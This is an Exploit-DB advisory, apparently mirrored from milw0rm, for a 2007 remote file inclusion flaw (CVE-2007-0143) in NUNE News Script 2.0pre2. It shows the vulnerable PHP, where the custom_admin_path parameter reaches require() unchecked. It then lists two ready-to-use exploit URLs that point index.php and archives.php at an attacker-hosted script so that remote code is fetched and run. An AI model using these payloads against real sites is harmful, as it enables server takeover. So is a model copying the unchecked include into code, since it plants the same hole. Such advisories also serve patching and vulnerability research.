[] NeoSense

NUNE News Script 2.0pre2 - Multiple Remote File Inclusions

Author: Mehmet Ince
type: webapps
platform: php
port: nan
date_added: 2007-01-05 
date_updated: 2016-09-21 
verified: 1 
codes: OSVDB-31209;CVE-2007-0143;OSVDB-31208 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comnune-2.0pre2.tar.gz

-----------------------------------------------

NUNE News Script (custom_admin_path) Remote File Include Vulnerablity

-----------------------------------------------

Author: xoron

-----------------------------------------------

Code:

if (isset($custom_admin_path))
    $special_admin_path = $custom_admin_path;

else
    $special_admin_path = "news/admin";

require("$special_admin_path/config/nune.conf.php");

-----------------------------------------------

3xplo!t:

www.target.com/[script]/index.php?custom_admin_path=http://evilscript?
www.target.com/[script]/archives.php?custom_admin_path=http://evilscript?

-----------------------------------------------

download: http://download.sourceforge.net/nune/nune-2.0pre2.tar.gz

-----------------------------------------------

Greetz: str0ke, kacper, GODAttach

nukedx'e elveda, kendine iyi bak dostum..!

-----------------------------------------------

# milw0rm.com [2007-01-06]